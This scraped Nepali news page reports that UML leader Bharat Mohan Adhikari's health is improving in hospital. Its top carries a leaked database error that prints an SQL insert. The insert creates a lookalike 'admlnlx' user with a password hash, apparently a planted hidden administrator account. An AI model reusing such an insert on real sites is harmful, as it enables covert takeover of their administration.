WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2mdMRNzwUgDYHJJhqjfW/VvehaogR0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:35:30', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
एमाले नेता भरतमोहनको स्वास्थ्य अवस्था सुधारोन्मुख – Gaule Khabar

एमाले नेता भरतमोहनको स्वास्थ्य अवस्था सुधारोन्मुख

एमाले नेता भरतमोहनको स्वास्थ्य अवस्था सुधारोन्मुख

काठमाडौँ, पुस १० –

नेकपा (एमाले)का नेता भरतमोहन अधिकारीको स्वास्थ्य अवस्था सुधारोन्मुख बन्दै गएको छ । स्वास्थ्यमा केही असजिलो महसुस आएपछि शुक्रबार राति बल्खुस्थित बयोधा अस्पतालमा भर्ना हुनुभएका अधिकारीको स्वास्थ्यमा अहिले क्रमिक सुधार आएको पार्टी केन्द्रीय कार्यालयका सचिव कृष्णगोपाल श्रेष्ठले जानकारी दिनुभयो ।

पूर्वउपप्रधानमन्त्री अधिकारीको ठूलो आन्द्रामा सङ्क्रमण रहेकाले त्यसको उपचार भइरहेको बताइएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका